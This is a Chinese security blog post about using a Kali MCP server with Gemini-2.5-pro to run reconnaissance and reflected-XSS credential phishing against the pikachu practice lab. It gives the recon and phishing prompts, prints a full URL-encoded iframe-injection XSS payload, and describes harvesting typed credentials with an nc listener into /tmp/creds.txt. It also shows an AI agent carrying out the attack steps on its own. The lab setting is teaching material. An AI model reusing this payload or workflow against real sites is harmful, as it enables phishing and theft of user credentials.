AI自动化钓鱼来袭!你的密码还安全吗?

admin 2025年6月18日16:31:29评论0 views字数 2407阅读8分1秒阅读模式

让Kali装上MCP除了能自动化渗透,还能干点啥呢?

钓个鱼呗,反正大模型自己写代码溜得飞起。

环境配置这里简单说一下,不是很明白的可以进星球哈,里面有视频讲解呢!!!

工具包获取:关注,后台私信:kalimcp

AI自动化钓鱼来袭!你的密码还安全吗?

1、在kali里跑起server服务

直接在kali中执行kali_server.py即可:

AI自动化钓鱼来袭!你的密码还安全吗?

2、物理机安装MCP

cmd直接直接执行mcp_server.py主打就是简单

python mcp_server.py --server http://192.168.3.24:5000 
AI自动化钓鱼来袭!你的密码还安全吗?

3、配置Trea的MCP

这个我就不给工具包了,自己百度搜Trea,去官网下就可以了,记得下国际版,里面有外面的大模型,好用些。

  • 1、mcp的路径改为自己的:D:kali_mcpmcp_server.py
  • 2、kali的地址:http://192.168.3.24:5000
{
"mcpServers": {
"kali_mcp": {
"command""cmd",
"args": [
"/c",
"python",
"D:\kali_mcp\mcp_server.py",
"--server",
"http://192.168.3.24:5000"
      ]
    }
  }
}

看到下面有kali_mcp就说明我们的配置就ok了

AI自动化钓鱼来袭!你的密码还安全吗?

剩下的就是干干干了!!!!

这次我们选择的模型是:Gemini-2.5-pro-Preview

按照我日常渗透的思路走。

环境:kali2024、LLM:Gemini-2.5-pro-Preview、靶场pikachu

信息收集

我们第一步先让他进行信息收集、记住这一步非常关键。

因为它能够将banner信息收集出来。

banner信息知道了,大模型已经学习过很多漏洞,其实已知漏洞,他自己就能测出来了,跟不不用我们下达过多命令

信息收集的提示词(提示词很关键,不会写的可以收藏,我星球会更新top10所以的提示词,需要的可以进。)

对给你的链接进行信息收集:
1、开放的端口和服务
2、操作系统、Web服务器及版本
3、中间件:编程语言、框架、数据库
4、前端使用的技术
5、泄露的敏感信息
http://192.168.3.222/pikachu/
AI自动化钓鱼来袭!你的密码还安全吗?

下面是他收集出来的效果:

AI自动化钓鱼来袭!你的密码还安全吗?
AI自动化钓鱼来袭!你的密码还安全吗?

收集的内容还是很全的。非常好后面可以直接使用。

反射型XSS进行钓鱼

发射型xss钓鱼的原理就不多说了把。

1、先验证这是反射型xss

2、构造url

3、诱骗别人点击填写账号密码

4、黑客后台收到被骗的账号密码

每个漏洞的原理要懂,这样你才能拆解出来,你才能写出来好的提示词。

AI才能帮你完成你像完成的任务。

这一步的提示词:

这个链接是一个反射型xss漏洞。
1、通过上文了解这个网站的基本信息
2、先对其进行请求,确认请求的各个参数
3、利用你的编码能力利用这个反射型xss构造一个登录的钓鱼网站
http://192.168.3.222/pikachu/vul/xss/xss_reflected_get.php
AI自动化钓鱼来袭!你的密码还安全吗?

从大模型显示的执行过程可以看出来,完全是按照我们的要求做的。

  • 验证XSS漏洞,确认提交的参数
  • 在kali中创建钓鱼页面
  • kali上开通nc监听传回来的账号密码。
AI自动化钓鱼来袭!你的密码还安全吗?
AI自动化钓鱼来袭!你的密码还安全吗?

在服务器上创建了钓鱼页面的日志记录:

AI自动化钓鱼来袭!你的密码还安全吗?

我们通过物理机的浏览器访问:

AI自动化钓鱼来袭!你的密码还安全吗?

http://192.168.3.222/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.write%28%27%3Ciframe%20src%3D%22http%3A%2F%2F192.168.3.1%3A8000%2Fphishing_page.html%22%20style%3D%22position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20width%3A100%25%3B%20height%3A100%25%3B%20border%3Anone%3B%20z-index%3A9999%3B%22%3E%3C%2Fiframe%3E%27%29%3C%2Fscript%3E&submit=submit

第一次访问可以看到页面很丑,并且提交按钮还不能提交。

AI自动化钓鱼来袭!你的密码还安全吗?

直接下达命令,让他自己进行完善页面:

AI自动化钓鱼来袭!你的密码还安全吗?

用了1分钟,再次刷新页面已经很漂亮了

这里真心不得不惊叹大模型的编码能力,想要啥口述即可

AI自动化钓鱼来袭!你的密码还安全吗?

直接输入admin/admin进行测试看看kali能不能收到。

AI自动化钓鱼来袭!你的密码还安全吗?

登录kali后台,在tmp目录下有个creds.txt文件。

里面记录了我们刚才提交的几个账号密码。

AI自动化钓鱼来袭!你的密码还安全吗?

不得不说,AI真的正在改变安全,特别是在编码能力上。

只要你能够把漏洞利用过程描述清楚,大模型就能帮你完成这些渗透,未来这些提示词肯定会成为标准化,可能成为脚本,也可能成为厂商漏扫盒子里面的规则。

在昨晚的测试中我还发现一个非常恐怖的事情:

我在测试爆破的时候,由于返回token的限制,一直没有成功,他尽然知道pikachu的默认账号密码admin/123456

然后利用他的记忆成功的登录成功了。

AI自动化钓鱼来袭!你的密码还安全吗?

想一下大模型是怎么出来的,是预训练的,也就是学习了非常非常多的知识,关键它不忘,你只要把banner信息告诉他,或者他能自己探测出来,他是不是就能从自己记忆中把已知漏洞给利用了???

是不是有点细思极恐了,昨晚信息收集,大模型就能把已知漏洞利用出来。

这个过程感兴趣的小伙伴可以到星球看哈。

星球介绍

一个人走的很快,但一群人才能地的更远。吉祥同学学安全这个星球🔗成立了1年左右,已经有500+的小伙伴了,如果你是网络安全的学生、想转行网络安全行业、需要网安相关的方案、ppt,戳链接🔗(内有优惠卷)快加入我们吧。系统性的知识库已经有:《Java代码审计》++《Web安全》++《应急响应》++《护网资料库》++《网安面试指南》+《AI+网安》

AI自动化钓鱼来袭!你的密码还安全吗?

原文始发于微信公众号(吉祥讲安全):AI自动化钓鱼来袭!你的密码还安全吗?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月18日16:31:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AI自动化钓鱼来袭!你的密码还安全吗?https://cn-sec.com/archives/4175001.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息